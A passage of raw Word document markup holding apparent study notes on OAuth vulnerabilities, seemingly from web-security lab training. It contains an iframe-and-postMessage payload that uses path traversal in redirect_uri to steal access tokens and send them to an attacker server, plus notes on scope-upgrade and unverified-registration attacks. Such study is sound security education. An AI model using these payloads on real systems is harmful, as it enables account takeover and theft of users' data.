          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If</w:t>
      </w:r>
      <w:r w:rsidR="00193293" w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00780A91" w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used</w:t>
      </w:r>
      <w:r w:rsidR="00780A91" w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00193293" w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> responses from server</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, set the redirect-uri pointing to the page containing it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B268EC0" w14:textId="736AE2FC" w:rsidR="00193293" w:rsidRPr="008026BD" w:rsidRDefault="00646BB7" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;iframe src="</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://YOUR-LAB-AUTH-SERVER/auth?client_id=YOUR-LAB-CLIENT_ID&amp;redirect_uri=https://YOUR-LAB-ID.web-security-academy.net/oauth-callback</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/../post/comment/comment-form</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&amp;response_type=token&amp;nonce=-1552239120&amp;scope=openid%20profile%20email</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113F54EA" w14:textId="77777777" w:rsidR="00193293" w:rsidRPr="008026BD" w:rsidRDefault="00193293" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A93D8B" w14:textId="77777777" w:rsidR="00193293" w:rsidRPr="008026BD" w:rsidRDefault="00193293" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    window.addEventListener('message', function(e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AAE19B" w14:textId="77777777" w:rsidR="00193293" w:rsidRPr="008026BD" w:rsidRDefault="00193293" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        fetch("/" + encodeURIComponent(e.data.data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9D9E33" w14:textId="77777777" w:rsidR="00193293" w:rsidRPr="008026BD" w:rsidRDefault="00193293" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    }, false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67538EC8" w14:textId="327E38CE" w:rsidR="00193293" w:rsidRPr="008026BD" w:rsidRDefault="00193293" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F560F2E" w14:textId="77777777" w:rsidR="00646BB7" w:rsidRPr="008026BD" w:rsidRDefault="00646BB7" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70FCEF88" w14:textId="77777777" w:rsidR="00646BB7" w:rsidRPr="008026BD" w:rsidRDefault="00646BB7" w:rsidP="00646BB7">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scope upgrade: authorization code flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64309CF0" w14:textId="7890368E" w:rsidR="00193293" w:rsidRPr="008026BD" w:rsidRDefault="00646BB7" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attacker has a client application which received approval from his user for accessing some data. Attacker can upgrade the scope paramater to receive more data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECE6F87" w14:textId="77777777" w:rsidR="00646BB7" w:rsidRPr="00646BB7" w:rsidRDefault="00646BB7" w:rsidP="00646BB7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00646BB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>POST /token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20993695" w14:textId="77777777" w:rsidR="00646BB7" w:rsidRPr="00646BB7" w:rsidRDefault="00646BB7" w:rsidP="00646BB7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00646BB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Host: oauth-authorization-server.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CFAFDF" w14:textId="77777777" w:rsidR="00646BB7" w:rsidRPr="00646BB7" w:rsidRDefault="00646BB7" w:rsidP="00646BB7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00646BB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E457AA" w14:textId="2A9ACB44" w:rsidR="00646BB7" w:rsidRPr="008026BD" w:rsidRDefault="00646BB7" w:rsidP="00646BB7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>client_id=12345&amp;client_secret=SECRET&amp;redirect_uri=https://client-app.com/callback&amp;grant_type=authorization_code&amp;code=a1b2c3d4e5f6g7h8&amp;scope=</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>openid%20 email%20profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3449E7AF" w14:textId="77777777" w:rsidR="00646BB7" w:rsidRPr="008026BD" w:rsidRDefault="00646BB7" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AF72296" w14:textId="3D40EF49" w:rsidR="00646BB7" w:rsidRPr="008026BD" w:rsidRDefault="008216C7" w:rsidP="008216C7">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scope upgrade: implicit flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2902B7D2" w14:textId="3391755C" w:rsidR="00E1008C" w:rsidRPr="008026BD" w:rsidRDefault="008216C7" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>After stealing the access token from the victim, attacker can upgrade the scope parameter to receive more data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A31730" w14:textId="77777777" w:rsidR="008216C7" w:rsidRPr="008026BD" w:rsidRDefault="008216C7" w:rsidP="008216C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37FAAFF8" w14:textId="273D9C54" w:rsidR="008216C7" w:rsidRPr="008026BD" w:rsidRDefault="008216C7" w:rsidP="008216C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unverified user registration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F36F69" w14:textId="2B8E838C" w:rsidR="00E1008C" w:rsidRPr="008026BD" w:rsidRDefault="008216C7" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Some Oauth services do not verify the entered details  when a user registers an account. Attacker can register another account with the same details (username, email,..) and use this acocunt to sign in as the victim in the client application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106CD3F8" w14:textId="77777777" w:rsidR="008216C7" w:rsidRPr="008026BD" w:rsidRDefault="008216C7" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09CF0FB7" w14:textId="77777777" w:rsidR="008216C7" w:rsidRPr="008026BD" w:rsidRDefault="008216C7" w:rsidP="008216C7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What is OpenID Connect?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AC130A" w14:textId="09305951" w:rsidR="008216C7" w:rsidRPr="008026BD" w:rsidRDefault="008216C7" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenID Connect </w:t>
      </w:r>
      <w:r w:rsidR="00DC1978" w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> add</w:t>
      </w:r>
      <w:r w:rsidR="00DC1978" w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00DC1978" w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> standardized, identity-related features to make authentication via OAuth work in a more reliable and uniform way</w:t>
      </w:r>
      <w:r w:rsidR="00DC1978" w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F1FCA2" w14:textId="25C1EF5D" w:rsidR="00DC1978" w:rsidRPr="008026BD" w:rsidRDefault="00DC1978" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- identical</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> set of scopes that are the same for all providers</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: scope=openid profile/email/address/phone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2E0B47" w14:textId="245508A5" w:rsidR="008216C7" w:rsidRPr="008026BD" w:rsidRDefault="00DC1978" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>an extra response type: </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id_token</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (returns </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JWT</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> containing claims</w:t>
      </w:r>
      <w:r w:rsidR="00704F80" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> about the user</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EAE999" w14:textId="660D02EC" w:rsidR="00DC1978" w:rsidRPr="00DC1978" w:rsidRDefault="00DC1978" w:rsidP="00DC1978">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1978">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Relying party</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1978">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t> - client application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1054F9" w14:textId="1C35F58C" w:rsidR="00DC1978" w:rsidRPr="00DC1978" w:rsidRDefault="00DC1978" w:rsidP="00DC1978">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
